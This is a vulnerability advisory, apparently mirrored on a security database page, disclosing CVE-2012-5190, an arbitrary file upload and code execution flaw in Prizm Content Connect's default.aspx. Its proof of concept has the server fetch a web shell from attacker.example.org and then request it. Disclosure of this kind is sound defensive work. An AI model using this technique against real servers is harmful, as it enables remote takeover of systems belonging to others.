Prizm Content Connect Code Execution

🗓️ 11 Jan 2013 00:00:00Reported by Include Security ResearchType

packetstorm🔗 packetstormsecurity.com👁 48 Views

Security risk in Prizm Content Connect default.aspx allows arbitrary file upload and code executio

Reporter	Title	Published	Views	Family All 9
Circl	CVE-2012-5190	9 Jan 201300:00	–	circl
CVE	CVE-2012-5190	21 Jan 202015:21	–	cve
Cvelist	CVE-2012-5190	21 Jan 202015:21	–	cvelist
NVD	CVE-2012-5190	21 Jan 202016:15	–	nvd
Prion	Privilege escalation	21 Jan 202016:15	–	prion
Tenable Nessus	Prizm Content Connect default.aspx document Parameter Remote File Inclusion	19 Feb 201300:00	–	nessus
RedhatCVE	CVE-2012-5190	22 May 202506:19	–	redhatcve
securityvulns	Arbitrary File Upload and Code Execution in Accusoft Prizm Content Connect	14 Jan 201300:00	–	securityvulns
securityvulns	Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)	14 Jan 201300:00	–	securityvulns

` In the course of our security assessment consulting we often find 0day  
vulnerabilities and report them to vendors. In this particular case the  
vendor has unfortunately shown a general disgregard for the security risk  
of this uncovered vulnerability which was originally disclosed privately to  
them on September 27th 2012. All original deadlines and even their own  
proposed fix dates have expired, as such we're releasing this advisory so  
that affected customers can update their WAF/IDS/IPS systems to protect  
themselves from this obvious vulnerability. We hope the Accusoft team  
addresses this vulnerability in a patch or upcoming release as soon as  
possible. This vulnerablity has been assigned CVE-2012-5190.  
  
Take care,  
  
Include Security Research Team  
  
Arbitrary File Upload and Execution in Prizm Content Connect default.aspx  
  
Prizm Content Connect web document viewer converts a variety of formats  
into Adobe Flash objects so that they can be viewed in a web browser. If  
Prizm Content Connect is configured according to the installation  
instructions, it will be vulnerable to arbitrary remote code execution.  
  
By default, the Prizm software includes a script called default.aspx which  
will accept a document parameter that is a remote URL. This script will  
download the remote document, save it to the server with an  
attacker-supplied filename extension, and reveal the path to the document  
on the local filesystem.  
  
Since, in the default configuration, the download path on the local  
filesystem resides within the web servers web root, the attacker can cause  
default.aspx to download a malicious ASPX script and save it with a  
dangerous .aspx extension. The attacker can then request the ASPX script  
from the server, causing the server to execute possibly malicious code  
contained within.  
Vulnerable versions  
  
This vulnerability was discovered in the following version, but we  
anticipate other versions to be vulnerable as well:  
  
· Prizm Content Connect 5.1  
Proof of concept  
  
First, the attacker causes the Prizm Content Connect software to download  
the malicious ASPX file:  
  
http://victim.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx  
  
The resulting page discloses the filename to which the ASPX file was  
downloaded, e.g.:  
  
Document Location: C:\Project\  
  
Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx  
  
Temp Location: C:\tempcache\  
  
The attacker then requests the ASPX shell from the root of the website:  
  
http://victim.example.com/ajwyfw45itxwys45fgzomrmv.aspx  
  
Assigned CVE#  
  
CVE-2012-5190  
`

11 Jan 2013 00:00Current

9.7High risk

Vulners AI Score9.7

EPSS0.10746